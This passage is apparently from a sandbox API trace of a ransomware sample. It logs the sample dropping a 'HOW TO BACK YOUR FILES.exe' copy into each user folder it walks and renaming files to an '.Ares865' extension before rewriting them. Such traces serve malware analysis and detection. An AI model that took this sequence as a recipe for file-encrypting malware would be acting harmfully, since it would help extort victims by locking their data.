HALPmcxz\\Local Settings\\Deployment" [0104.279] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.279] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Deployment\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\deployment\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.280] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.280] GetLastError () returned 0x0 [0104.280] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.280] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Deployment\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f4081e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f4081e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.281] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.281] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.281] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps" [0104.281] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps" [0104.281] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.281] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.282] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.282] GetLastError () returned 0x0 [0104.282] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.282] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f42e340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f42e340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.282] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.282] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.282] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0" [0104.283] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0" [0104.283] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.283] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.283] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.284] GetLastError () returned 0x0 [0104.284] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.284] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f42e340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f42e340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.284] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.284] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.284] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX" [0104.284] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX" [0104.284] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.284] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.285] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.285] GetLastError () returned 0x0 [0104.285] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.285] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f42e340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f42e340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.286] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.286] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.286] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT" [0104.286] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT" [0104.286] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.286] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.287] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.287] GetLastError () returned 0x0 [0104.287] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.287] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f42e340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f42e340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.287] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.287] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.287] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests" [0104.288] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests" [0104.288] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.288] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.288] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.289] GetLastError () returned 0x0 [0104.289] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.289] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f4544a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f4544a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.289] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.289] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.289] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms.Ares865") returned 164 [0104.289] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms.ares865"), dwFlags=0x1) returned 1 [0104.291] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.291] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17104) returned 1 [0104.294] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.Ares865") returned 166 [0104.294] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.ares865"), dwFlags=0x1) returned 1 [0104.296] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.296] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13643) returned 1 [0104.302] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms.Ares865") returned 164 [0104.302] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms.ares865"), dwFlags=0x1) returned 1 [0104.304] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.304] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14512) returned 1 [0104.309] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.Ares865") returned 166 [0104.309] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.ares865"), dwFlags=0x1) returned 1 [0104.310] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.310] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11824) returned 1 [0104.314] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec" [0104.314] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec" [0104.314] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.314] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.314] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.315] GetLastError () returned 0x0 [0104.315] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.315] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f4544a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f4544a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.315] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.315] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.315] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.Ares865") returned 166 [0104.315] MoveFileExW 